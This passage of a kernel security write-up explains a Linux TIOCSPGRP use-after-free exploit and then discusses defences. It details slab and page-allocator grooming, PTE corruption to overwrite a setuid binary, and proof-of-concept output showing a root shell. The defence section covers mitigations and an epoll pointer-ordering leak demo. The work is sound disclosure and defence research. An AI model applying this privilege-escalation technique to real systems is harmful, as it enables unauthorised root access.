0x40 numbers[0].ns (8) pwqlist.next (8) lock (0x20): counter (8)
0x48 --- pwqlist.prev (8)
0x50 --- ep (8)
0x58 --- fllink.next (8)
0x60 --- fllink.prev (8) op (8)
0x68 --- ws (8) poll_event (4)
0x6c --- [hole] (4)
0x70 --- event.events (4) file (8)
0x74 --- event.data (8) (CONTROL)
0x78 --- private (8) (TARGET?)
0x7c --- ---
0x80 --- --- ---

In this case, reallocating the object as one of those three types didn't seem to me like a nice way forward (although it should be possible to exploit this somehow with some effort, e.g. by using count.counter to corrupt the buf field of seq_file). Also, some systems might be using the slab_nomerge kernel command line flag, which disables this merging behavior.

Another approach that I didn't look into here would have been to try to corrupt the obfuscated SLUB freelist pointer (obfuscation is implemented in freelist_ptr()); but since that stores the pointer in big-endian, count.counter would only effectively let us corrupt the more significant half of the pointer, which would probably be a pain to exploit.

Attack stage: Freeing the object's page to the page allocator

This section will refer to some internals of the SLUB allocator; if you aren't familiar with those, you may want to at least look at slides 2-4 and 13-14 of Christoph Lameter's slab allocator overview talk from 2014. (Note that that talk covers three different allocators; the SLUB allocator is what most systems use nowadays.)

The alternative to exploiting the UAF at the SLUB allocator level is to flush the page out to the page allocator (also called the buddy allocator), which is the last level of dynamic memory allocation on Linux (once the system is far enough into the boot process that the memblock allocator is no longer used). From there, the page can theoretically end up in pretty much any context. We can flush the page out to the page allocator with the following steps:

  1. Instruct the kernel to pin our task to a single CPU. Both SLUB and the page allocator use per-cpu structures; so if the kernel migrates us to a different CPU in the middle, we would fail.
  2. Before allocating the victim struct pid whose refcount will be corrupted, allocate a large number of objects to drain partially-free slab pages of all their unallocated objects. If the victim object (which will be allocated in step 5 below) landed in a page that is already partially used at this point, we wouldn't be able to free that page.
  3. Allocate around objs_per_slab * (1+cpu_partial) objects - in other words, a set of objects that completely fill at least cpu_partial pages, where cpu_partial is the maximum length of the "percpu partial list". Those newly allocated pages that are completely filled with objects are not referenced by SLUB's freelists at this point because SLUB only tracks pages with free objects on its freelists.
  4. Fill objs_per_slab-1 more objects, such that at the end of this step, the "CPU slab" (the page from which allocations will be served first) will not contain anything other than free space and fresh allocations (created in this step).
  5. Allocate the victim object (a struct pid). The victim page (the page from which the victim object came) will usually be the CPU slab from step 4, but if step 4 completely filled the CPU slab, the victim page might also be a new, freshly allocated CPU slab.
  6. Trigger the bug on the victim object to create an uncounted reference, and free the object.
  7. Allocate objs_per_slab+1 more objects. After this, the victim page will be completely filled with allocations from steps 4 and 7, and it won't be the CPU slab anymore (because the last allocation can not have fit into the victim page).
  8. Free all allocations from steps 4 and 7. This causes the victim page to become empty, but does not free the page; the victim page is placed on the percpu partial list once a single object from that page has been freed, and then stays on that list.
  9. Free one object per page from the allocations from step 3. This adds all these pages to the percpu partial list until it reaches the limit cpu_partial, at which point it will be flushed: Pages containing some in-use objects are placed on SLUB's per-NUMA-node partial list, and pages that are completely empty are freed back to the page allocator. (We don't free all allocations from step 3 because we only want the victim page to be freed to the page allocator.) Note that this step requires that every objs_per_slab-th object the allocator gave us in step 3 is on a different page.

When the page is given to the page allocator, we benefit from the page being order-0 (4 KiB, native page size): For order-0 pages, the page allocator has special freelists, one per CPU+zone+migratetype combination. Pages on these freelists are not normally accessed from other CPUs, and they don't immediately get combined with adjacent free pages to form higher-order free pages.

At this point we are able to perform use-after-free accesses to some offset inside the free victim page, using codepaths that interpret part of the victim page as a struct pid. Note that at this point, we still don't know exactly at which offset inside the victim page the victim object is located.

Attack stage: Reallocating the victim page as a pagetable

At the point where the victim page has reached the page allocator's freelist, it's essentially game over - at this point, the page can be reused as anything in the system, giving us a broad range of options for exploitation. In my opinion, most defences that act after we've reached this point are fairly unreliable.

One type of allocation that is directly served from the page allocator and has nice properties for exploitation are page tables (which have also been used to exploit Rowhammer). One way to abuse the ability to modify a page table would be to enable the read/write bit in a page table entry (PTE) that maps a file page to which we are only supposed to have read access - for example, this could be used to gain write access to part of a setuid binary's .text segment and overwrite it with malicious code.

We don't know at which offset inside the victim page the victim object is located; but since a page table is effectively an array of 8-byte-aligned elements of size 8 and the victim object's alignment is a multiple of that, as long as we spray all elements of the victim array, we don't need to know the victim object's offset.

To allocate a page table full of PTEs mapping the same file page, we have to:

  • prepare by setting up a 2MiB-aligned memory region (because each last-level page table describes 2MiB of virtual memory) containing single-page mmap() mappings of the same file page (meaning each mapping corresponds to one PTE); then
  • trigger allocation of the page table and fill it with PTEs by reading from each mapping

struct pid has the same alignment as a PTE, and it starts with a 32-bit refcount, so that refcount is guaranteed to overlap the first half of a PTE, which is 64-bit. Because X86 CPUs are little-endian, incrementing the refcount field in the freed struct pid increments the least significant half of the PTE - so it effectively increments the PTE. (Except for the edge case where the least significant half is 0xffffffff, but that's not the case here.)

struct pid: count | level |   tasks[0]  |   tasks[1]  |   tasks[2]  | ... 
pagetable:       PTE      |     PTE     |     PTE     |     PTE     | ...

Therefore we can increment one of the PTEs by repeatedly triggering get_pid(), which tries to increment the refcount of the freed object. This can be turned into the ability to write to the file page as follows:

  • Increment the PTE by 0x42 to set the Read/Write bit and the Dirty bit. (If we didn't set the Dirty bit, the CPU would do it by itself when we write to the corresponding virtual address, so we could also just increment by 0x2 here.)
  • For each mapping, attempt to overwrite its contents with malicious data and ignore page faults.
    • This might throw spurious errors because of outdated TLB entries, but taking a page fault will automatically evict such TLB entries, so if we just attempt the write twice, this can't happen on the second write (modulo CPU migration, as mentioned above).
    • One easy way to ignore page faults is to let the kernel perform the memory write using pread(), which will return -EFAULT on fault.

If the kernel notices the Dirty bit later on, that might trigger writeback, which could crash the kernel if the mapping isn't set up for writing. Therefore, we have to reset the Dirty bit. We can't reliably decrement the PTE because put_pid() inefficiently accesses pid->numbers[pid->level] even when the refcount isn't dropping to zero, but we can increment it by an additional 0x80-0x42=0x3e, which means the final value of the PTE, compared to the initial value, will just have the additional bit 0x80 set, which the kernel ignores.

Afterwards, we launch the setuid executable (which, in the version in the pagecache, now contains the code we injected), and gain root privileges:

user@deb10:~/tiocspgrp$ make
as -o rootshell.o rootshell.S
ld -o rootshell rootshell.o --nmagic
gcc -Wall -o poc poc.c
user@deb10:~/tiocspgrp$ ./poc
starting up...
executing in first level child process, setting up session and PTY pair...
setting up unix sockets for ucreds spam...
draining pcpu and node partial pages
preparing for flushing pcpu partial pages
launching child process
child is 1448
ucreds spam done, struct pid refcount should be lifted. starting to skew refcount...
refcount should now be skewed, child exiting
child exited cleanly
waiting for RCU call...
bpf load with rlim 0x0: -1 (Operation not permitted)
bpf load with rlim 0x1000: 452 (Success)
bpf load success with rlim 0x1000: got fd 452
....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
RCU callbacks executed
gonna try to free the pid...
double-free child died with signal 9 after dropping 9990 references (99%)
hopefully reallocated as an L1 pagetable now
PTE forcibly marked WRITE | DIRTY (hopefully)
clobber via corrupted PTE succeeded in page 0, 128-byte-allocation index 3, returned 856
clobber via corrupted PTE succeeded in page 0, 128-byte-allocation index 3, returned 856
bash: cannot set terminal process group (1447): Inappropriate ioctl for device
bash: no job control in this shell
root@deb10:/home/user/tiocspgrp# id
uid=0(root) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(lpadmin),113(scanner),120(wireshark)
root@deb10:/home/user/tiocspgrp# 

Note that nothing in this whole exploit requires us to leak any kernel-virtual or physical addresses, partly because we have an increment primitive instead of a plain write; and it also doesn't involve directly influencing the instruction pointer.

Defence

This section describes different ways in which this exploit could perhaps have been prevented from working. To assist the reader, the titles of some of the subsections refer back to specific exploit stages from the section above.

Against bugs being reachable: Attack surface reduction

A potential first line of defense against many kernel security issues is to only make kernel subsystems available to code that needs access to them. If an attacker does not have direct access to a vulnerable subsystem and doesn't have sufficient influence over a system component with access to make it trigger the issue, the issue is effectively unexploitable from the attacker's security context.

Pseudoterminals are (more or less) only necessary for interactively serving users who have shell access (or something resembling that), including:

  • terminal emulators inside graphical user sessions
  • SSH servers
  • screen sessions started from various types of terminals

Things like webservers or phone apps won't normally need access to such devices; but there are exceptions. For example:

  • a web server is used to provide a remote root shell for system administration
  • a phone app's purpose is to make a shell available to the user
  • a shell script uses expect to interact with a binary that requires a terminal for input/output

In my opinion, the biggest limits on attack surface reduction as a defensive strategy are:

  1. It exposes a workaround to an implementation concern of the kernel (potential memory safety issues) in user-facing API, which can lead to compatibility issues and maintenance overhead - for example, from a security standpoint, I think it might be a good idea to require phone apps and systemd services to declare their intention to use the PTY subsystem at install time, but that would be an API change requiring some sort of action from application authors, creating friction that wouldn't be necessary if we were confident that the kernel is working properly. This might get especially messy in the case of software that invokes external binaries depending on configuration, e.g. a web server that needs PTY access when it is used for server administration. (This is somewhat less complicated when a benign-but-potentially-exploitable application actively applies restrictions to itself; but not every application author is necessarily willing to design a fine-grained sandbox for their code, and even then, there may be compatibility issues caused by libraries outside the application author's control.)
  2. It can't protect a subsystem from a context that fundamentally needs access to it. (E.g. Android's /dev/binder is directly accessible by Chrome renderers on Android because they have Android code running inside them.)
  3. It means that decisions that ought to not influence the security of a system (making an API that does not grant extra privileges available to some potentially-untrusted context) essentially involve a security tradeoff.

Still, in practice, I believe that attack surface reduction mechanisms (especially seccomp) are currently some of the most important defense mechanisms on Linux.

Against bugs in source code: Compile-time locking validation

The bug in TIOCSPGRP was a fairly straightforward violation of a straightforward locking rule: While a tty_struct is live, accessing its pgrp member is forbidden unless the ctrl_lock of the same tty_struct is held. This rule is sufficiently simple that it wouldn't be entirely unreasonable to expect the compiler to be able to verify it - as long as you somehow inform the compiler about this rule, because figuring out the intended locking rules just from looking at a piece of code can often be hard even for humans (especially when some of the code is incorrect).

When you are starting a new project from scratch, the overall best way to approach this is to use a memory-safe language - in other words, a language that has explicitly been designed such that the programmer has to provide the compiler with enough information about intended memory safety semantics that the compiler can automatically verify them. But for existing codebases, it might be worth looking into how much of this can be retrofitted.

Clang's Thread Safety Analysis feature does something vaguely like what we'd need to verify the locking in this situation:

$ nl -ba -s' ' thread-safety-test.cpp | sed 's|^   ||'
  1 struct __attribute__((capability("mutex"))) mutex {
  2 };
  3 
  4 void lock_mutex(struct mutex *p) __attribute__((acquire_capability(*p)));
  5 void unlock_mutex(struct mutex *p) __attribute__((release_capability(*p)));
  6 
  7 struct foo {
  8     int a __attribute__((guarded_by(mutex)));
  9     struct mutex mutex;
 10 };
 11 
 12 int good(struct foo *p1, struct foo *p2) {
 13     lock_mutex(&p1->mutex);
 14     int result = p1->a;
 15     unlock_mutex(&p1->mutex);
 16     return result;
 17 }
 18 
 19 int bogus(struct foo *p1, struct foo *p2) {
 20     lock_mutex(&p1->mutex);
 21     int result = p2->a;
 22     unlock_mutex(&p1->mutex);
 23     return result;
 24 }
$ clang++ -c -o thread-safety-test.o thread-safety-test.cpp -Wall -Wthread-safety
thread-safety-test.cpp:21:22: warning: reading variable 'a' requires holding mutex 'p2->mutex' [-Wthread-safety-precise]
    int result = p2->a;
                     ^
thread-safety-test.cpp:21:22: note: found near match 'p1->mutex'
1 warning generated.
$ 

However, this does not currently work when compiling as C code because the guarded_by attribute can't find the other struct member; it seems to have been designed mostly for use in C++ code. A more fundamental problem is that it also doesn't appear to have built-in support for distinguishing the different rules for accessing a struct member depending on the lifetime state of the object. For example, almost all objects with locked members will have initialization/destruction functions that have exclusive access to the entire object and can access members without locking. (The lock might not even be initialized in those states.)

Some objects also have more lifetime states; in particular, for many objects with RCU-managed lifetime, only a subset of the members may be accessed through an RCU reference without having upgraded the reference to a refcounted one beforehand. Perhaps this could be addressed by introducing a new type attribute that can be used to mark pointers to structs in special lifetime states? (For C++ code, Clang's Thread Safety Analysis simply disables all checks in all constructor/destructor functions.)

I am hopeful that, with some extensions, something vaguely like Clang's Thread Safety Analysis could be used to retrofit some level of compile-time safety against unintended data races. This will require adding a lot of annotations, in particular to headers, to document intended locking semantics; but such annotations are probably anyway necessary to enable productive work on a complex codebase. In my experience, when there are no detailed comments/annotations on locking rules, every attempt to change a piece of code you're not intimately familiar with (without introducing horrible memory safety bugs) turns into a foray into the thicket of the surrounding call graphs, trying to unravel the intentions behind the code.

The one big downside is that this requires getting the development community for the codebase on board with the idea of backfilling and maintaining such annotations. And someone has to write the analysis tooling that can verify the annotations.

At the moment, the Linux kernel does have some very coarse locking validation via sparse; but this infrastructure is not capable of detecting situations where the wrong lock is used or validating that a struct member is protected by a lock. It also can't properly deal with things like conditional locking, which makes it hard to use for anything other than spinlocks/RCU. The kernel's runtime locking validation via LOCKDEP is more advanced, but mostly with a focus on locking correctness of RCU pointers as well as deadlock detection (the main focus); again, there is no mechanism to, for example,automatically validate that a given struct member is only accessed under a specific lock (which would probably also be quite costly to implement with runtime validation). Also, as a runtime validation mechanism, it can't discover errors in code that isn't executed during testing (although it can combine separately observed behavior into race scenarios without ever actually observing the race).

Against bugs in source code: Global static locking analysis

An alternative approach to checking memory safety rules at compile time is to do it either after the entire codebase has been compiled, or with an external tool that analyzes the entire codebase. This allows the analysis tooling to perform analysis across compilation units, reducing the amount of information that needs to be made explicit in headers. This may be a more viable approach if peppering annotations everywhere across headers isn't viable; but it also reduces the utility to human readers of the code, unless the inferred semantics are made visible to them through some special code viewer. It might also be less ergonomic in the long run if changes to one part of the kernel could make the verification of other parts fail - especially if those failures only show up in some configurations.

I think global static analysis is probably a good tool for finding some subsets of bugs, and it might also help with finding the worst-case depth of kernel stacks or proving the absence of deadlocks, but it's probably less suited for proving memory safety correctness?

Against exploit primitives: Attack primitive reduction via syscall restrictions

(Yes, I made up that name because I thought that capturing this under "Attack surface reduction" is too muddy.)

Because allocator fastpaths (both in SLUB and in the page allocator) are implemented using per-CPU data structures, the ease and reliability of exploits that want to coax the kernel's memory allocators into reallocating memory in specific ways can be improved if the attacker has fine-grained control over the assignment of exploit threads to CPU cores. I'm calling such a capability, which provides a way to facilitate exploitation by influencing relevant system state/behavior, an "attack primitive" here. Luckily for us, Linux allows tasks to pin themselves to specific CPU cores without requiring any privilege using the sched_setaffinity() syscall.

(As a different example, one primitive that can provide an attacker with fairly powerful capabilities is being able to indefinitely stall kernel faults on userspace addresses via FUSE or userfaultfd.)

Just like in the section "Attack surface reduction" above, an attacker's ability to use these primitives can be reduced by filtering syscalls; but while the mechanism and the compatibility concerns are similar, the rest is fairly different:

Attack primitive reduction does not normally reliably prevent a bug from being exploited; and an attacker will sometimes even be able to obtain a similar but shoddier (more complicated, less reliable, less generic, ...) primitive indirectly, for example:

Attack surface reduction is about limiting access to code that is suspected to contain exploitable bugs; in a codebase written in a memory-unsafe language, that tends to apply to pretty much the entire codebase. Attack surface reduction is often fairly opportunistic: You permit the things you need, and deny the rest by default.

Attack primitive reduction limits access to code that is suspected or known to provide (sometimes very specific) exploitation primitives. For example, one might decide to specifically forbid access to FUSE and userfaultfd for most code because of their utility for kernel exploitation, and, if one of those interfaces is truly needed, design a workaround that avoids exposing the attack primitive to userspace. This is different from attack surface reduction, where it often makes sense to permit access to any feature that a legitimate workload wants to use.

A nice example of an attack primitive reduction is the sysctl vm.unprivileged_userfaultfd, which was first introduced so that userfaultfd can be made completely inaccessible to normal users and was then later adjusted so that users can be granted access to part of its functionality without gaining the dangerous attack primitive. (But if you can create unprivileged user namespaces, you can still use FUSE to get an equivalent effect.)

When maintaining lists of allowed syscalls for a sandboxed system component, or something along those lines, it may be a good idea to explicitly track which syscalls are explicitly forbidden for attack primitive reduction reasons, or similarly strong reasons - otherwise one might accidentally end up permitting them in the future. (I guess that's kind of similar to issues that one can run into when maintaining ACLs...)

But like in the previous section, attack primitive reduction also tends to rely on making some functionality unavailable, and so it might not be viable in all situations. For example, newer versions of Android deliberately indirectly give apps access to FUSE through the AppFuse mechanism. (That API doesn't actually give an app direct access to /dev/fuse, but it does forward read/write requests to the app.)

Against oops-based oracles: Lockout or panic on crash

The ability to recover from kernel oopses in an exploit can help an attacker compensate for a lack of information about system state. Under some circumstances, it can even serve as a binary oracle that can be used to more or less perform a binary search for a value, or something like that.

(It used to be even worse on some distributions, where dmesg was accessible for unprivileged users; so if you managed to trigger an oops or WARN, you could then grab the register states at all IRET frames in the kernel stack, which could be used to leak things like kernel pointers. Luckily nowadays most distributions, including Ubuntu 20.10, restrict dmesg access.)

Android and Chrome OS nowadays set the kernel's panic_on_oops flag, meaning the machine will immediately restart when a kernel oops happens. This makes it hard to use oopsing as part of an exploit, and arguably also makes more sense from a reliability standpoint - the system will be down for a bit, and it will lose its existing state, but it will also reset into a known-good state instead of continuing in a potentially half-broken state, especially if the crashing thread was holding mutexes that can never again be released, or things like that. On the other hand, if some service crashes on a desktop system, perhaps that shouldn't cause the whole system to immediately go down and make you lose unsaved state - so panic_on_oops might be too drastic there.

A good solution to this might require a more fine-grained approach. (For example, grsecurity has for a long time had the ability to lock out specific UIDs that have caused crashes.) Perhaps it would make sense to allow the init daemon to use different policies for crashes in different services/sessions/UIDs?

Against UAF access: Deterministic UAF mitigation

One defense that would reliably stop an exploit for this issue would be a deterministic use-after-free mitigation. Such a mitigation would reliably protect the memory formerly occupied by the object from accesses through dangling pointers to the object, at least once the memory has been reused for a different purpose (including reuse to store heap metadata). For write operations, this probably requires either atomicity of the access check and the actual write or an RCU-like delayed freeing mechanism. For simple read operations, it can also be implemented by ordering the access check after the read, but before the read value is used.

A big downside of this approach on its own is that extra checks on every memory access will probably come with an extremely high efficiency penalty, especially if the mitigation can not make any assumptions about what kinds of parallel accesses might be happening to an object, or what semantics pointers have. (The proof-of-concept implementation I presented at LSSNA 2020 (slides, recording) had CPU overhead roughly in the range 60%-159% in kernel-heavy benchmarks, and ~8% for a very userspace-heavy benchmark.)

Unfortunately, even a deterministic use-after-free mitigation often won't be enough to deterministically limit the blast radius of something like a refcounting mistake to the object in which it occurred. Consider a case where two codepaths concurrently operate on the same object: Codepath A assumes that the object is live and subject to normal locking rules. Codepath B knows that the reference count reached zero, assumes that it therefore has exclusive access to the object (meaning all members are mutable without any locking requirements), and is trying to tear down the object. Codepath B might then start dropping references the object was holding on other objects while codepath A is following the same references. This could then lead to use-after-frees on pointed-to objects. If all data structures are subject to the same mitigation, this might not be too much of a problem; but if some data structures (like struct page) are not protected, it might permit a mitigation bypass.

Similar issues apply to data structures with union members that are used in different object states; for example, here's some random kernel data structure with an rcu_head in a union (just a random example, there isn't anything wrong with this code as far as I know):

struct allowedips_node {
    struct wg_peer __rcu *peer;
    struct allowedips_node __rcu *bit[2];
    /* While it may seem scandalous that we waste space for v4,
     * we're alloc'ing to the nearest power of 2 anyway, so this
     * doesn't actually make a difference.
     */
    u8 bits[16] __aligned(__alignof(u64));
    u8 cidr, bit_at_a, bit_at_b, bitlen;

    /* Keep rarely used list at bottom to be beyond cache line. */
    union {
        struct list_head peer_list;
        struct rcu_head rcu;
    };
};

As long as everything is working properly, the peer_list member is only used while the object is live, and the rcu member is only used after the object has been scheduled for delayed freeing; so this code is completely fine. But if a bug somehow caused the peer_list to be read after the rcu member has been initialized, type confusion would result.

In my opinion, this demonstrates that while UAF mitigations do have a lot of value (and would have reliably prevented exploitation of this specific bug), a use-after-free is just one possible consequence of the symptom class "object state confusion" (which may or may not be the same as the bug class of the root cause). It would be even better to enforce rules on object states, and ensure that an object e.g. can't be accessed through a "refcounted" reference anymore after the refcount has reached zero and has logically transitioned into a state like "non-RCU members are exclusively owned by thread performing teardown" or "RCU callback pending, non-RCU members are uninitialized" or "exclusive access to RCU-protected members granted to thread performing teardown, other members are uninitialized". Of course, doing this as a runtime mitigation would be even costlier and messier than a reliable UAF mitigation; this level of protection is probably only realistic with at least some level of annotations and static validation.

Against UAF access: Probabilistic UAF mitigation; pointer leaks

Summary: Some types of probabilistic UAF mitigation break if the attacker can leak information about pointer values; and information about pointer values easily leaks to userspace, e.g. through pointer comparisons in map/set-like structures.

If a deterministic UAF mitigation is too costly, an alternative is to do it probabilistically; for example, by tagging pointers with a small number of bits that are checked against object metadata on access, and then changing that object metadata when objects are freed.

The downside of this approach is that information leaks can be used to break the protection. One example of a type of information leak that I'd like to highlight (without any judgment on the relative importance of this compared to other types of information leaks) are intentional pointer comparisons, which have quite a few facets.

A relatively straightforward example where this could be an issue is the kcmp() syscall. This syscall compares two kernel objects using an arithmetic comparison of their permuted pointers (using a per-boot randomized permutation, see kptr_obfuscate()) and returns the result of the comparison (smaller, equal or greater). This gives userspace a way to order handles to kernel objects (e.g. file descriptors) based on the identities of those kernel objects (e.g. struct file instances), which in turn allows userspace to group a set of such handles by backing kernel object in O(n*log(n)) time using a standard sorting algorithm.

This syscall can be abused for improving the reliability of use-after-free exploits against some struct types because it checks whether two pointers to kernel objects are equal without accessing those objects: An attacker can allocate an object, somehow create a reference to the object that is not counted properly, free the object, reallocate it, and then verify whether the reallocation indeed reused the same address by comparing the dangling reference and a reference to the new object with kcmp(). If kcmp() includes the pointer's tag bits in the comparison, this would likely also permit breaking probabilistic UAF mitigations.

Essentially the same concern applies when a kernel pointer is encrypted and then given to userspace in fuse_lock_owner_id(), which encrypts the pointer to a files_struct with an open-coded version of XTEA before passing it to a FUSE daemon.

In both these cases, explicitly stripping tag bits would be an acceptable workaround because a pointer without tag bits still uniquely identifies a memory location; and given that these are very special interfaces that intentionally expose some degree of information about kernel pointers to userspace, it would be reasonable to adjust this code manually.

A somewhat more interesting example is the behavior of this piece of userspace code:

#define _GNU_SOURCE
#include <sys/epoll.h>
#include <sys/eventfd.h>
#include <sys/resource.h>
#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

int main(void) {
  struct rlimit rlim;
  SYSCHK(getrlimit(RLIMIT_NOFILE, &rlim));
  rlim.rlim_cur = rlim.rlim_max;
  SYSCHK(setrlimit(RLIMIT_NOFILE, &rlim));

  cpu_set_t cpuset;
  CPU_ZERO(&cpuset);
  CPU_SET(0, &cpuset);
  SYSCHK(sched_setaffinity(0, sizeof(cpuset), &cpuset));

  int epfd = SYSCHK(epoll_create1(0));
  for (int i=0; i<1000; i++)
    SYSCHK(eventfd(0, 0));
  for (int i=0; i<192; i++) {
    int fd = SYSCHK(eventfd(0, 0));
    struct epoll_event event = {
      .events = EPOLLIN,
      .data = { .u64 = i }
    };
    SYSCHK(epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &event));
  }

  char cmd[100];
  sprintf(cmd, "cat /proc/%d/fdinfo/%d", getpid(), epfd);
  system(cmd);
}

It first creates a ton of eventfds that aren't used. Then it creates a bunch more eventfds and creates epoll watches for them, in creation order, with a monotonically incrementing counter in the "data" field. Afterwards, it asks the kernel to print the current state of the epoll instance, which comes with a list of all registered epoll watches, including the value of the data member (in hex). But how is this list sorted? Here's the result of running that code in a Ubuntu 20.10 VM (truncated, because it's a bit long):

user@ubuntuvm:~/epoll_fdinfo$ ./epoll_fdinfo 
pos:    0
flags:  02
mnt_id: 14
tfd:     1040 events:       19 data:               24  pos:0 ino:2f9a sdev:d
tfd:     1050 events:       19 data:               2e  pos:0 ino:2f9a sdev:d
tfd:     1024 events:       19 data:               14  pos:0 ino:2f9a sdev:d
tfd:     1029 events:       19 data:               19  pos:0 ino:2f9a sdev:d
tfd:     1048 events:       19 data:               2c  pos:0 ino:2f9a sdev:d
tfd:     1042 events:       19 data:               26  pos:0 ino:2f9a sdev:d
tfd:     1026 events:       19 data:               16  pos:0 ino:2f9a sdev:d
tfd:     1033 events:       19 data:               1d  pos:0 ino:2f9a sdev:d
[...]

The data: field here is the loop index we stored in the .data member, formatted as hex. Here is the complete list of the data values in decimal:

36, 46, 20, 25, 44, 38, 22, 29, 30, 45, 33, 28, 41, 31, 23, 37, 24, 50, 32, 26, 21, 43, 35, 48, 27, 39, 40, 47, 42, 34, 49, 19, 95, 105, 111, 84, 103, 97, 113, 88, 89, 104, 92, 87, 100, 90, 114, 96, 83, 109, 91, 85, 112, 102, 94, 107, 86, 98, 99, 106, 101, 93, 108, 110, 12, 1, 14, 5, 6, 9, 4, 17, 7, 13, 0, 8, 2, 11, 3, 15, 16, 18, 10, 135, 145, 119, 124, 143, 137, 121, 128, 129, 144, 132, 127, 140, 130, 122, 136, 123, 117, 131, 125, 120, 142, 134, 115, 126, 138, 139, 146, 141, 133, 116, 118, 66, 76, 82, 55, 74, 68, 52, 59, 60, 75, 63, 58, 71, 61, 53, 67, 54, 80, 62, 56, 51, 73, 65, 78, 57, 69, 70, 77, 72, 64, 79, 81, 177, 155, 161, 166, 153, 147, 163, 170, 171, 154, 174, 169, 150, 172, 164, 178, 165, 159, 173, 167, 162, 152, 176, 157, 168, 148, 149, 156, 151, 175, 158, 160, 186, 188, 179, 180, 183, 191, 181, 187, 182, 185, 189, 190, 184

While these look sort of random, you can see that the list can be split into blocks of length 32 that consist of shuffled contiguous sequences of numbers:

Block 1 (32 values in range 19-50):
36, 46, 20, 25, 44, 38, 22, 29, 30, 45, 33, 28, 41, 31, 23, 37, 24, 50, 32, 26, 21, 43, 35, 48, 27, 39, 40, 47, 42, 34, 49, 19

Block 2 (32 values in range 83-114):
95, 105, 111, 84, 103, 97, 113, 88, 89, 104, 92, 87, 100, 90, 114, 96, 83, 109, 91, 85, 112, 102, 94, 107, 86, 98, 99, 106, 101, 93, 108, 110

Block 3 (19 values in range 0-18):
12, 1, 14, 5, 6, 9, 4, 17, 7, 13, 0, 8, 2, 11, 3, 15, 16, 18, 10

Block 4 (32 values in range 115-146):
135, 145, 119, 124, 143, 137, 121, 128, 129, 144, 132, 127, 140, 130, 122, 136, 123, 117, 131, 125, 120, 142, 134, 115, 126, 138, 139, 146, 141, 133, 116, 118

Block 5 (32 values in range 51-82):
66, 76, 82, 55, 74, 68, 52, 59, 60, 75, 63, 58, 71, 61, 53, 67, 54, 80, 62, 56, 51, 73, 65, 78, 57, 69, 70, 77, 72, 64, 79, 81

Block 6 (32 values in range 147-178):
177, 155, 161, 166, 153, 147, 163, 170, 171, 154, 174, 169, 150, 172, 164, 178, 165, 159, 173, 167, 162, 152, 176, 157, 168, 148, 149, 156, 151, 175, 158, 160

Block 7 (13 values in range 179-191):
186, 188, 179, 180, 183, 191, 181, 187, 182, 185, 189, 190, 184

What's going on here becomes clear when you look at the data structures epoll uses internally. ep_insert calls ep_rbtree_insert to insert a struct epitem into a red-black tree (a type of sorted binary tree); and this red-black tree is sorted using a tuple of a struct file * and a file descriptor number:

/* Compare RB tree keys */
static inline int ep_cmp_ffd(struct epoll_filefd *p1,
                             struct epoll_filefd *p2)
{
        return (p1->file > p2->file ? +1:
                (p1->file < p2->file ? -1 : p1->fd - p2->fd));
}

So the values we're seeing have been ordered based on the virtual address of the corresponding struct file; and SLUB allocates struct file from order-1 pages (i.e. pages of size 8 KiB), which can hold 32 objects each:

root@ubuntuvm:/sys/kernel/slab/filp# cat order 
1
root@ubuntuvm:/sys/kernel/slab/filp# cat objs_per_slab 
32
root@ubuntuvm:/sys/kernel/slab/filp# 

This explains the grouping of the numbers we saw: Each block of 32 contiguous values corresponds to an order-1 page that was previously empty and is used by SLUB to allocate objects until it becomes full.

With that knowledge, we can transform those numbers a bit, to show the order in which objects were allocated inside each page (excluding pages for which we haven't seen all allocations):

$ cat slub_demo.py 
#!/usr/bin/env python3
blocks = [
  [ 36, 46, 20, 25, 44, 38, 22, 29, 30, 45, 33, 28, 41, 31, 23, 37, 24, 50, 32, 26, 21, 43, 35, 48, 27, 39, 40, 47, 42, 34, 49, 19 ],
  [ 95, 105, 111, 84, 103, 97, 113, 88, 89, 104, 92, 87, 100, 90, 114, 96, 83, 109, 91, 85, 112, 102, 94, 107, 86, 98, 99, 106, 101, 93, 108, 110 ],
  [ 12, 1, 14, 5, 6, 9, 4, 17, 7, 13, 0, 8, 2, 11, 3, 15, 16, 18, 10 ],
  [ 135, 145, 119, 124, 143, 137, 121, 128, 129, 144, 132, 127, 140, 130, 122, 136, 123, 117, 131, 125, 120, 142, 134, 115, 126, 138, 139, 146, 141, 133, 116, 118 ],
  [ 66, 76, 82, 55, 74, 68, 52, 59, 60, 75, 63, 58, 71, 61, 53, 67, 54, 80, 62, 56, 51, 73, 65, 78, 57, 69, 70, 77, 72, 64, 79, 81 ],
  [ 177, 155, 161, 166, 153, 147, 163, 170, 171, 154, 174, 169, 150, 172, 164, 178, 165, 159, 173, 167, 162, 152, 176, 157, 168, 148, 149, 156, 151, 175, 158, 160 ],
  [ 186, 188, 179, 180, 183, 191, 181, 187, 182, 185, 189, 190, 184 ]
]

for alloc_indices in blocks:
  if len(alloc_indices) != 32:
    continue
  # indices of allocations ('data'), sorted by memory location, shifted to be relative to the block
  alloc_indices_relative = [position - min(alloc_indices) for position in alloc_indices]
  # reverse mapping: memory locations of allocations,
  # sorted by index of allocation ('data').
  # if we've observed all allocations in a page,
  # these will really be indices into the page.
  memory_location_by_index = [alloc_indices_relative.index(idx) for idx in range(0, len(alloc_indices))]
  print(memory_location_by_index)
$ ./slub_demo.py 
[31, 2, 20, 6, 14, 16, 3, 19, 24, 11, 7, 8, 13, 18, 10, 29, 22, 0, 15, 5, 25, 26, 12, 28, 21, 4, 9, 1, 27, 23, 30, 17]
[16, 3, 19, 24, 11, 7, 8, 13, 18, 10, 29, 22, 0, 15, 5, 25, 26, 12, 28, 21, 4, 9, 1, 27, 23, 30, 17, 31, 2, 20, 6, 14]
[23, 30, 17, 31, 2, 20, 6, 14, 16, 3, 19, 24, 11, 7, 8, 13, 18, 10, 29, 22, 0, 15, 5, 25, 26, 12, 28, 21, 4, 9, 1, 27]
